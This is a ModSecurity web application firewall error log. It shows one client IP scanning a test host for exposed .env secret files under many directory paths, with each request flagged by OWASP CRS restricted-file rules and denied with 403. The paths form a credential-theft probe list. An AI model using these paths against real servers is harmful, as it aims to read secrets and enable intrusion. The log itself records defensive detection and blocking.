[Fri Nov 28 03:21:29.972242 2025] [:error] [pid 376322] [client 3.123.22.145:49750] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSkHKaJmhnjvcqmd-gK-zQAAAAE"]
[Fri Nov 28 03:21:29.972308 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSkHKY6_oD2P8Ob2jfQpuwAAAAQ"]
[Fri Nov 28 03:21:29.972432 2025] [:error] [pid 376322] [client 3.123.22.145:49750] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSkHKaJmhnjvcqmd-gK-zQAAAAE"]
[Fri Nov 28 03:21:29.973671 2025] [:error] [pid 376324] [client 3.123.22.145:49746] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSkHKSmjlkOhMBMVUbR2NAAAAAM"]
[Fri Nov 28 03:21:29.973835 2025] [:error] [pid 376324] [client 3.123.22.145:49746] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSkHKSmjlkOhMBMVUbR2NAAAAAM"]
[Fri Nov 28 03:21:29.973993 2025] [:error] [pid 376324] [client 3.123.22.145:49746] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSkHKSmjlkOhMBMVUbR2NAAAAAM"]
[Fri Nov 28 03:21:30.143255 2025] [:error] [pid 376624] [client 3.123.22.145:49754] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSkHKu-aHw4EAQCl6ArgLQAAAAY"]
[Fri Nov 28 03:21:30.143507 2025] [:error] [pid 376624] [client 3.123.22.145:49754] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSkHKu-aHw4EAQCl6ArgLQAAAAY"]
[Fri Nov 28 03:21:30.143735 2025] [:error] [pid 376624] [client 3.123.22.145:49754] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSkHKu-aHw4EAQCl6ArgLQAAAAY"]
[Fri Nov 28 03:21:31.112048 2025] [:error] [pid 376627] [client 3.123.22.145:49752] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSkHK2Yw1mVniHXRjIdTrQAAAAg"]
[Fri Nov 28 03:21:31.112198 2025] [:error] [pid 376626] [client 3.123.22.145:49744] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSkHKxY37ftiQrkmT0Va7wAAAAc"]
[Fri Nov 28 03:21:31.112301 2025] [:error] [pid 376627] [client 3.123.22.145:49752] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSkHK2Yw1mVniHXRjIdTrQAAAAg"]
[Fri Nov 28 03:21:31.112428 2025] [:error] [pid 376626] [client 3.123.22.145:49744] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSkHKxY37ftiQrkmT0Va7wAAAAc"]
[Fri Nov 28 03:21:31.112515 2025] [:error] [pid 376627] [client 3.123.22.145:49752] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSkHK2Yw1mVniHXRjIdTrQAAAAg"]
[Fri Nov 28 03:21:31.112610 2025] [:error] [pid 376626] [client 3.123.22.145:49744] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSkHKxY37ftiQrkmT0Va7wAAAAc"]
[Fri Nov 28 03:21:31.939721 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSkHKw-9erAMS4LBdXdtQAAAAAA"]
[Fri Nov 28 03:21:31.939947 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSkHKw-9erAMS4LBdXdtQAAAAAA"]
[Fri Nov 28 03:21:31.940121 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSkHKw-9erAMS4LBdXdtQAAAAAA"]
[Fri Nov 28 03:21:32.399556 2025] [:error] [pid 376628] [client 3.123.22.145:49940] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSkHLFRUVzGnHZZa3xmdwQAAAAk"]
[Fri Nov 28 03:21:32.399813 2025] [:error] [pid 376628] [client 3.123.22.145:49940] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSkHLFRUVzGnHZZa3xmdwQAAAAk"]
[Fri Nov 28 03:21:32.399987 2025] [:error] [pid 376630] [client 3.123.22.145:50256] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSkHLGZW0FWNcgrBnndxbQAAAAs"]
[Fri Nov 28 03:21:32.400022 2025] [:error] [pid 376628] [client 3.123.22.145:49940] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSkHLFRUVzGnHZZa3xmdwQAAAAk"]
[Fri Nov 28 03:21:32.400219 2025] [:error] [pid 376630] [client 3.123.22.145:50256] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSkHLGZW0FWNcgrBnndxbQAAAAs"]
[Fri Nov 28 03:21:32.400408 2025] [:error] [pid 376630] [client 3.123.22.145:50256] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSkHLGZW0FWNcgrBnndxbQAAAAs"]
[Fri Nov 28 03:21:32.402151 2025] [:error] [pid 376631] [client 3.123.22.145:50074] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSkHLJjihkEKa1eLtZQM9AAAAAw"]
[Fri Nov 28 03:21:32.402382 2025] [:error] [pid 376631] [client 3.123.22.145:50074] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSkHLJjihkEKa1eLtZQM9AAAAAw"]
[Fri Nov 28 03:21:32.402477 2025] [:error] [pid 376629] [client 3.123.22.145:49938] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSkHLPhg8hfveV7ouMq93gAAAAo"]
[Fri Nov 28 03:21:32.402568 2025] [:error] [pid 376631] [client 3.123.22.145:50074] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSkHLJjihkEKa1eLtZQM9AAAAAw"]
[Fri Nov 28 03:21:32.402670 2025] [:error] [pid 376629] [client 3.123.22.145:49938] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSkHLPhg8hfveV7ouMq93gAAAAo"]
[Fri Nov 28 03:21:32.402844 2025] [:error] [pid 376629] [client 3.123.22.145:49938] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSkHLPhg8hfveV7ouMq93gAAAAo"]
[Fri Nov 28 03:21:33.081518 2025] [:error] [pid 376322] [client 3.123.22.145:49750] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSkHLaJmhnjvcqmd-gK-zgAAAAE"]
[Fri Nov 28 03:21:33.081737 2025] [:error] [pid 376322] [client 3.123.22.145:49750] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSkHLaJmhnjvcqmd-gK-zgAAAAE"]
[Fri Nov 28 03:21:33.081916 2025] [:error] [pid 376322] [client 3.123.22.145:49750] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSkHLaJmhnjvcqmd-gK-zgAAAAE"]
[Fri Nov 28 03:21:33.258305 2025] [:error] [pid 376633] [client 3.123.22.145:50640] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSkHLW88kzzPEPYQx2dlBQAAAA4"]
[Fri Nov 28 03:21:33.260609 2025] [:error] [pid 376633] [client 3.123.22.145:50640] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSkHLW88kzzPEPYQx2dlBQAAAA4"]
[Fri Nov 28 03:21:33.260823 2025] [:error] [pid 376633] [client 3.123.22.145:50640] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSkHLW88kzzPEPYQx2dlBQAAAA4"]
[Fri Nov 28 03:21:33.260339 2025] [:error] [pid 376632] [client 3.123.22.145:50336] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSkHLSFRk6OLxC60KclrmAAAAA0"]
[Fri Nov 28 03:21:33.261231 2025] [:error] [pid 376636] [client 3.123.22.145:50922] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSkHLW0NQDb3u_nRglh4hwAAABE"]
[Fri Nov 28 03:21:33.261389 2025] [:error] [pid 376632] [client 3.123.22.145:50336] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSkHLSFRk6OLxC60KclrmAAAAA0"]
[Fri Nov 28 03:21:33.261440 2025] [:error] [pid 376636] [client 3.123.22.145:50922] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSkHLW0NQDb3u_nRglh4hwAAABE"]
[Fri Nov 28 03:21:33.261562 2025] [:error] [pid 376632] [client 3.123.22.145:50336] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSkHLSFRk6OLxC60KclrmAAAAA0"]
